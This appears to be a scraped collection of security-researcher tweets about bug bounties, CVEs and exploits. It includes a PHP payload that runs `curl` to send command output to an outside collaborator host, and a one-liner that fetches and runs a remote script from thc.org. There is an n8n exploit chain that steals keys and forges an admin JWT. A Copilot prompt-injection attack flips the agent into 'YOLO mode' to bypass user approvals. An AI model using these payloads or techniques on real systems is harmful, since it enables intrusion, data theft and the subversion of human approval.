💥 New attack! Our researcher Arseniy Sharoglazov discovered a PHP's Arbitrary Object Instantiation with no user-defined classes. It was turned to RCE! Read the research: swarm.ptsecurity.com/exploiting-arb…

We had such a great time last night at dinner with some of our Core Pentesters! #DEFCON30

Thank you Cobalt, Elizabeth Ramirez ,Hak5 😊🚀

Finans Sektörü Odaklı Siber Tatbikat & CTF yarışmasında; QNB Finansbank adına takım arkadaşlarım Onur Er ve Hüseyin Ulutürk ile beraber 1. olduk.

Did you know a new JWT Attack was recently published?! 🤯️ CVE-2023-30845 bypasses JWT checking by using the X-HTTP-Method-Override request header!

GraphQL DOS Cases uceka.com/2023/12/13/gra… - Introspection-based Circular - Field Duplication - Directives Overloading - Alias Overloading

OOB RCE > Unauth + Unrestricted File Upload API Uploading files possible, but paths redirect to default page, blocking direct execution. Payload: <?php system('curl burp.collabo.com -d "data=$(id)"') ?> #bugbounty #bugbountytips #CyberSecurity

Yay, today was a good day, after reading JS files for 10 hours and with several chains I found an ATO without interaction bypassing the client and server side encryption mechanism. I recommend this article, it helped me a lot, the bug was triaged :). infosecwriteups.com/bypassing-asym…

Today I received a $12,000 bounty using the Sandwich Attack ! 🤑 The vulnerability allowed me to enumerate the API Keys of other users 🤯 How did I do that ? Well the API key was a UUIDv1. If you are not familiar with UUIDv1s you need to know that they are constructed in 6

Deobfuscating Android ARM64 strings with Ghidra: Emulating, Patching, and Automating #MobileSecurity #AndroidSecurity by Jeroen Beckers and NVISO Labs blog.nviso.eu/2024/01/15/deo…

We Hacked Google A.I. for $50,000 : landh.tech/blog/20240304-… credits Lupin Joseph Thacker Justin Gardner

In April, Sam Curry and I discovered a way to bypass airport security via SQL injection in a database of crewmembers. Unfortunately, DHS ghosted us after we disclosed the issue, and the TSA attempted to cover up what we found. Here is our writeup: ian.sh/tsa

Analysis of backdoored SSH (CVE-2024-6387) exploits santandersecurityresearch.github.io/blog/sshing_th… Credits Santander's security team #ssh #infosec

Attacking UNIX Systems via CUPS, Part I evilsocket.net/2024/09/26/Att…

💥CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner): “. <(curl -SsfL thc.org/7350pipe)”

💥 Remote Code Execution in GitHub Copilot (CVE-2025-53773) 👉 Prompt injection exploit writes to Copilot config file and puts it into YOLO mode, then we get immediate RCE 🔥 Bypasses all user approvals 🛡️ Patch is out today. Update before someone else does it for you

#CVE-2025-55182: RSC RCE — It functions as an in-memory webshell backdoor, offering a significantly more covert foothold. Please verify this again on your own endpoint.

CVE-2026-21858 + CVE-2025-68613: n8n Ni8mare - Full Chain Exploit Unauthenticated to Root RCE: - LFI via Content-Type confusion - Read /proc/self/environ to find HOME - Steal encryption key + database - Forge admin JWT token - Expression injection sandbox bypass - RCE as root

$312,500 worth of stored/reflected XSS vulnerabilities in Meta’s Conversions API Gateway allowed Javascript code to run on any Facebook domain and millions of third-party websites. The flaw enabled zero-click Facebook account takeover and more: ysamm.com/uncategorized/…

"Bir imtihan size ansızın geldiği gibi, bir kurtuluşta ansızın gelecektir. * Allah'a tevekkül et ve ümitsizliğe kapılma."